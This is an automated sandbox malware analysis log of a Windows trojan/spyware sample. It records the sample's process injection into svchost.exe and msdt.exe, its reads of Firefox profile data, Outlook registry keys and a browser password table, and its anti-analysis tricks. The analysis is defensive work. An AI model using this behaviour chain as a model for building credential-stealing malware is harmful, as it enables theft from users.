Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_04534F40	5_2_04534F40
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_04562F30	5_2_04562F30
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_04502F28	5_2_04502F28
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044E0F30	5_2_044E0F30
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044B2FC8	5_2_044B2FC8
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044CCFE0	5_2_044CCFE0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_0453EFA0	5_2_0453EFA0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044CA840	5_2_044CA840
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044C2840	5_2_044C2840
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044EE8F0	5_2_044EE8F0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044A68B8	5_2_044A68B8
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044D6962	5_2_044D6962
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044C29A0	5_2_044C29A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_0458A9A6	5_2_0458A9A6
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044BEA80	5_2_044BEA80
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_0457AB40	5_2_0457AB40
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_04576BD7	5_2_04576BD7
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044B1460	5_2_044B1460
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_0457F43F	5_2_0457F43F
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_04577571	5_2_04577571
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_045895C3	5_2_045895C3
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_0455D5B0	5_2_0455D5B0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_04505630	5_2_04505630
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_045716CC	5_2_045716CC
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_0457F7B0	5_2_0457F7B0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044C70C0	5_2_044C70C0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_0456F0CC	5_2_0456F0CC
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_0457F0E0	5_2_0457F0E0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_045770E9	5_2_045770E9
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044F516C	5_2_044F516C
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_0458B16B	5_2_0458B16B
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044AF172	5_2_044AF172
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044CB1B0	5_2_044CB1B0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044DB2C0	5_2_044DB2C0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_045612ED	5_2_045612ED
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044C52A0	5_2_044C52A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044AD34C	5_2_044AD34C
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_0457132D	5_2_0457132D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_0450739A	5_2_0450739A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_04539C32	5_2_04539C32
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_0457FCF2	5_2_0457FCF2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044C3D40	5_2_044C3D40
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_04571D5A	5_2_04571D5A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_04577D73	5_2_04577D73
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044DFDC0	5_2_044DFDC0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044C9EB0	5_2_044C9EB0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_0457FF09	5_2_0457FF09
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044C1F92	5_2_044C1F92
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_0457FFB1	5_2_0457FFB1
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_0452D800	5_2_0452D800
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044C38E0	5_2_044C38E0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044C9950	5_2_044C9950
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044DB950	5_2_044DB950
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_04555910	5_2_04555910
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_04577A46	5_2_04577A46
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_0457FA49	5_2_0457FA49
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_04533A6C	5_2_04533A6C
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_0456DAC6	5_2_0456DAC6
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_04505AA0	5_2_04505AA0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_04561AA3	5_2_04561AA3
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_0455DAAC	5_2_0455DAAC
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_0457FB76	5_2_0457FB76
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_04535BF0	5_2_04535BF0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044FDBF9	5_2_044FDBF9
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044DFB80	5_2_044DFB80
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_001C1F00	5_2_001C1F00
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_001BCE37	5_2_001BCE37
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_001BCE40	5_2_001BCE40
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_001BB040	5_2_001BB040
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_001BD060	5_2_001BD060
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_001BB190	5_2_001BB190
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_001BB184	5_2_001BB184
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_001BB1D9	5_2_001BB1D9
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_001C55A0	5_2_001C55A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_001C37B0	5_2_001C37B0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_001DBBE0	5_2_001DBBE0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_0431E435	5_2_0431E435
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_0431E7CD	5_2_0431E7CD
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_0431E318	5_2_0431E318
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_0431D898	5_2_0431D898
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_0431CAFE	5_2_0431CAFE
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_0431CB38	5_2_0431CB38

Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: String function: 00BF0AE3 appears 70 times
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: String function: 00BD7DE1 appears 35 times
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: String function: 00BF8900 appears 42 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 035AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03587E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0352B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03575130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 035BF290 appears 105 times
Source: C:\Windows\SysWOW64\msdt.exe	Code function: String function: 04507E54 appears 111 times
Source: C:\Windows\SysWOW64\msdt.exe	Code function: String function: 044AB970 appears 280 times
Source: C:\Windows\SysWOW64\msdt.exe	Code function: String function: 044F5130 appears 58 times
Source: C:\Windows\SysWOW64\msdt.exe	Code function: String function: 0453F290 appears 105 times
Source: C:\Windows\SysWOW64\msdt.exe	Code function: String function: 0452EA12 appears 86 times

Source: rACq8Eaix6.exe, 00000000.00000003.2094327030.000000000434D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs rACq8Eaix6.exe
Source: rACq8Eaix6.exe, 00000000.00000003.2093341203.00000000041A3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs rACq8Eaix6.exe

Source: rACq8Eaix6.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/3@10/10

Source: C:\Users\user\Desktop\rACq8Eaix6.exe

Code function: 0_2_00C3A06A GetLastError,FormatMessageW,

0_2_00C3A06A

Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00C281CB AdjustTokenPrivileges,CloseHandle,		0_2_00C281CB
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00C287E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00C287E1

Source: C:\Users\user\Desktop\rACq8Eaix6.exe

Code function: 0_2_00C3B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00C3B3FB

Source: C:\Users\user\Desktop\rACq8Eaix6.exe

Code function: 0_2_00C4EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00C4EE0D

Source: C:\Users\user\Desktop\rACq8Eaix6.exe

Code function: 0_2_00C3C397 CoInitialize,CoCreateInstance,CoUninitialize,

0_2_00C3C397

Source: C:\Users\user\Desktop\rACq8Eaix6.exe

Code function: 0_2_00BD4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00BD4E89

Source: C:\Users\user\Desktop\rACq8Eaix6.exe

File created: C:\Users\user\AppData\Local\Temp\aut2761.tmp

Jump to behavior

Source: rACq8Eaix6.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\rACq8Eaix6.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: msdt.exe, 00000005.00000002.3911543722.000000000060D000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000005.00000003.2676161491.000000000060D000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000005.00000002.3911543722.000000000063B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: rACq8Eaix6.exe	Virustotal: Detection: 59%
Source: rACq8Eaix6.exe	ReversingLabs: Detection: 73%

Source: unknown	Process created: C:\Users\user\Desktop\rACq8Eaix6.exe "C:\Users\user\Desktop\rACq8Eaix6.exe"
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rACq8Eaix6.exe"
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	Process created: C:\Windows\SysWOW64\msdt.exe "C:\Windows\SysWOW64\msdt.exe"
Source: C:\Windows\SysWOW64\msdt.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rACq8Eaix6.exe"	Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	Process created: C:\Windows\SysWOW64\msdt.exe "C:\Windows\SysWOW64\msdt.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\msdt.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\msdt.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: rACq8Eaix6.exe

Static file information: File size 1225216 > 1048576

Source: rACq8Eaix6.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: rACq8Eaix6.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: rACq8Eaix6.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: rACq8Eaix6.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: rACq8Eaix6.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: rACq8Eaix6.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: rACq8Eaix6.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: msdt.pdbGCTL source: svchost.exe, 00000002.00000003.2462008144.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2462008144.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, HSGhOUKfqFw.exe, 00000004.00000003.2437041170.00000000002FB000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HSGhOUKfqFw.exe, 00000004.00000000.2415537649.000000000020E000.00000002.00000001.01000000.00000005.sdmp, HSGhOUKfqFw.exe, 00000007.00000002.3911325478.000000000020E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: rACq8Eaix6.exe, 00000000.00000003.2093784982.0000000004080000.00000004.00001000.00020000.00000000.sdmp, rACq8Eaix6.exe, 00000000.00000003.2094702219.0000000004220000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2399848966.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2493600903.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2493600903.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2397612744.0000000003100000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000005.00000002.3913459249.0000000004480000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000005.00000003.2496368379.00000000042DA000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000005.00000003.2493325915.0000000004120000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000005.00000002.3913459249.000000000461E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: rACq8Eaix6.exe, 00000000.00000003.2093784982.0000000004080000.00000004.00001000.00020000.00000000.sdmp, rACq8Eaix6.exe, 00000000.00000003.2094702219.0000000004220000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2399848966.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2493600903.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2493600903.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2397612744.0000000003100000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, msdt.exe, 00000005.00000002.3913459249.0000000004480000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000005.00000003.2496368379.00000000042DA000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000005.00000003.2493325915.0000000004120000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000005.00000002.3913459249.000000000461E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: msdt.exe, 00000005.00000002.3911543722.0000000000592000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000005.00000002.3913942435.0000000004AAC000.00000004.10000000.00040000.00000000.sdmp, HSGhOUKfqFw.exe, 00000007.00000002.3913197510.00000000032CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2786008912.000000003CA7C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: msdt.exe, 00000005.00000002.3911543722.0000000000592000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000005.00000002.3913942435.0000000004AAC000.00000004.10000000.00040000.00000000.sdmp, HSGhOUKfqFw.exe, 00000007.00000002.3913197510.00000000032CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2786008912.000000003CA7C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: msdt.pdb source: svchost.exe, 00000002.00000003.2462008144.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2462008144.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, HSGhOUKfqFw.exe, 00000004.00000003.2437041170.00000000002FB000.00000004.00000001.00020000.00000000.sdmp

Source: rACq8Eaix6.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: rACq8Eaix6.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: rACq8Eaix6.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: rACq8Eaix6.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: rACq8Eaix6.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\rACq8Eaix6.exe

Code function: 0_2_00BD4B37 LoadLibraryA,GetProcAddress,

0_2_00BD4B37

Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00BF8945 push ecx; ret	0_2_00BF8958
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00BE8C74 push esp; retn 0000h	0_2_00BE8C76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403000 push eax; ret	2_2_00403002
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00417281 push cs; ret	2_2_00417282
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418B78 push es; retf	2_2_00418B89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418B98 push es; retf	2_2_00418B89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401540 push esi; retf E746h	2_2_0040186F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041663A pushad ; retf	2_2_00416640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00424F93 push edi; ret	2_2_00424F9E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0350225F pushad ; ret	2_2_035027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035027FA pushad ; ret	2_2_035027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035309AD push ecx; mov dword ptr [esp], ecx	2_2_035309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0350283D push eax; iretd	2_2_03502858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0350135E push eax; iretd	2_2_03501369
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	Code function: 4_2_02F9D2FB pushad ; retf	4_2_02F9D301
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	Code function: 4_2_02F9C2CB push ss; retf	4_2_02F9C2CD
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	Code function: 4_2_02F9DF42 push cs; ret	4_2_02F9DF43
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	Code function: 4_2_02F9C46C push 2B3FE2CEh; ret	4_2_02F9C49A
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe	Code function: 4_2_02FABC54 push edi; ret	4_2_02FABC5F
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_044B09AD push ecx; mov dword ptr [esp], ecx	5_2_044B09B6
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_001CC1DF push FFFFFFD8h; retf	5_2_001CC203
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_001C427E push cs; ret	5_2_001C427F
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_001C2607 push ss; retf	5_2_001C2609
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_001C27A8 push 2B3FE2CEh; ret	5_2_001C27D6
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_001C3637 pushad ; retf	5_2_001C363D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_001CB9E1 push ebx; iretd	5_2_001CB9E2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_001C5B75 push es; retf	5_2_001C5B86
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_001C5B95 push es; retf	5_2_001C5B86
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_001C9F55 push ebp; iretd	5_2_001C9F57
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_001D1F90 push edi; ret	5_2_001D1F9B
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_0431B5F8 push edi; retf	5_2_0431B64E

Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00BD48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00BD48D7
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00C55376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00C55376

Source: C:\Users\user\Desktop\rACq8Eaix6.exe

Code function: 0_2_00BF3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00BF3187

Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\rACq8Eaix6.exe

API/Special instruction interceptor: Address: 181C644

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0357096E rdtsc

2_2_0357096E

Source: C:\Users\user\Desktop\rACq8Eaix6.exe	API coverage: 4.6 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.6 %
Source: C:\Windows\SysWOW64\msdt.exe	API coverage: 2.6 %

Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe TID: 5676	Thread sleep time: -55000s >= -30000s			Jump to behavior
Source: C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe TID: 5676	Thread sleep time: -36000s >= -30000s			Jump to behavior

Source: C:\Windows\SysWOW64\msdt.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\msdt.exe	Last function: Thread delayed

